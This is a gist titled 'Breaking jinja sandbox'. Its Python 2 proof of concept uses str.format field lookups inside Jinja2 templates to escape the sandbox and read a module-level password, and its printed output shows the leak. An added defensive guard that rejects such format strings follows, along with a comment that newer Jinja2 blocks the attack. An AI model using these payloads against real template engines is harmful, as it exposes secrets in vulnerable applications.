Created December 24, 2014 23:09
Breaking jinja sandbox
#!/usr/bin/env python
# Python 2 script: a function's module globals are exposed as func_globals
# (spelled __globals__ in Python 3).
from collections import namedtuple
import sys
import jinja2.sandbox

# The secret the templates must not be able to read: a plain module global.
password = "valuable password"


class A(object):
    def _hidden_method(self):
        pass


def just_function(a):
    return '"' + a + '"'


jinja = jinja2.sandbox.SandboxedEnvironment()
ctx = dict(
    named_tuple=namedtuple("hello", "a b")(1, 2),
    any_function=just_function,
    custom_instance=A,
)

# Each template line passes a harmless context object to str.format. The format
# string then uses the .attr / [key] lookups that str.format performs itself to
# walk from that object to a function's globals, to sys.modules, and from there
# to __main__.password. The sandbox of the time checked attribute access in the
# template but not the lookups done inside str.format.
print(jinja.from_string("""
ANY_FUNCTION {{ "{.func_globals[sys].modules[__main__].password}".format(any_function) }}
INSTANCE {{ "{._hidden_method.func_globals[sys].modules[__main__].password}".format(custom_instance) }}
NAMED_TUPLE {{ "{._asdict.func_globals[OrderedDict].clear.func_globals[_sys].modules[__main__].password}".format(named_tuple) }}
BUILTIN_RANGE {{ "{.func_globals[_mutable_sequence_types][1].insert.__func__.func_globals[sys].modules[__main__].password}".format(range) }}
""").render(ctx))
ANY_FUNCTION valuable password
INSTANCE valuable password
NAMED_TUPLE valuable password
BUILTIN_RANGE valuable password
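The weakness the gist demonstrates is not specific to Jinja: `str.format` resolves `{field.attr}` with `getattr` and `{field[key]}` with `__getitem__`, so whoever controls the format string can walk from any argument to that object's module globals. Jinja2 later closed this in `SandboxedEnvironment` by intercepting `str.format` (which is why the commenter below sees an exception on 2.10.3 instead of the password). Application code that formats caller-supplied templates outside Jinja needs the same guard. The following is an added example, not code from the gist or from Jinja2: it parses the format string with the standard library's `string.Formatter.parse` and refuses any replacement field that performs attribute or item access or nests another field in its format spec. The function names and the sample context are my own; the rejected payload is the gist's first format string, used only as the input the guard must refuse.

```python
"""Guard for caller-supplied str.format templates (added example, not gist code)."""
import string

# Format string taken verbatim from the gist above; used here only as the input
# the guard must reject. Python 3 spells func_globals as __globals__, but the
# traversal shape (.attr and [key] inside a replacement field) is identical.
GIST_PAYLOAD = "{.func_globals[sys].modules[__main__].password}"


class UnsafeFormatString(ValueError):
    """Raised when a format string would walk attributes or items of an argument."""


_FORMATTER = string.Formatter()


def check_format_string(fmt):
    """Return the top-level field names used by fmt, or raise UnsafeFormatString.

    str.format resolves ``{name.attr}`` with getattr and ``{name[key]}`` with
    __getitem__; that is the whole trick in the gist, since any argument then
    becomes a starting point for a walk to its module globals. A field that
    contains '.' or '[' is therefore refused. A format spec that itself contains
    a nested replacement field ("{0:{1}}") is refused as well, because the
    nested field is resolved the same way.
    """
    names = []
    for _literal, field_name, format_spec, _conversion in _FORMATTER.parse(fmt):
        if field_name is None:  # trailing literal text, no replacement field
            continue
        if "." in field_name or "[" in field_name:
            raise UnsafeFormatString("attribute/item access in field %r" % field_name)
        if format_spec and ("{" in format_spec or "}" in format_spec):
            raise UnsafeFormatString("nested field in format spec %r" % format_spec)
        names.append(field_name)
    return names


def is_safe_format_string(fmt):
    """True if check_format_string accepts fmt; malformed strings count as unsafe."""
    try:
        check_format_string(fmt)
    except ValueError:  # UnsafeFormatString, or Formatter.parse rejecting the syntax
        return False
    return True


def safe_format(fmt, *args, **kwargs):
    """Format fmt with args/kwargs only if it performs no object traversal."""
    check_format_string(fmt)
    return fmt.format(*args, **kwargs)


if __name__ == "__main__":
    def just_function(a):  # constructed stand-in for the gist's any_function
        return '"' + a + '"'

    print(safe_format("ANY_FUNCTION {0} ({name})", "ok", name="plain fields are fine"))
    for candidate in ["{0} and {name}", "{0!r:>5}", "{0:{1}}", GIST_PAYLOAD]:
        print("%-55r safe=%s" % (candidate, is_safe_format_string(candidate)))
    try:
        safe_format(GIST_PAYLOAD, just_function)
    except UnsafeFormatString as exc:
        print("rejected:", exc)
```

The check is deliberately coarse: it rejects every `.` and `[` in a field name rather than trying to whitelist "harmless" attributes, because the gist shows that an attribute that looks innocuous on one object (`_asdict`, `insert`) is still a path to globals. If callers need attribute formatting, resolve the values in trusted code first and pass them as plain keyword arguments.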
This does not break the sandbox with version Jinja2==2.10.3. Instead, it throws the following exception (I tried the strings provided by you in various orders).